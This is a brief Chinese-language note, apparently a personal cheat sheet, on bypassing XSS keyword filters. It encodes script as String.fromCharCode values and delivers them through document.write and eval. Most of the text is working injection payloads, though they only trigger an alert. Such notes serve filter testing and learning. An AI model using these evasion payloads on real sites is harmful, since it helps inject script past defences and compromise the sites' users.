String.fromCharCode

<script>alert(/xss/)</script>

 String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 47, 120, 115, 115, 47, 41, 60, 47, 115, 99, 114, 105, 112, 116, 62)

alert(/xss/)

 String.fromCharCode(97, 108, 101, 114, 116, 40, 47, 120, 115, 115, 47, 41)

1.与document.write搭配

 <script>document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 47, 120, 115, 115, 47, 41, 60, 47, 115, 99, 114, 105, 112, 116, 62))</script>

如果本身内容包含在document.write()内,则直接用String.fromCharCode()即可

2.与eval搭配

<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 47, 120, 115, 115, 47, 41))</script>

3.适用于<script>未被过滤而alert被过滤的情况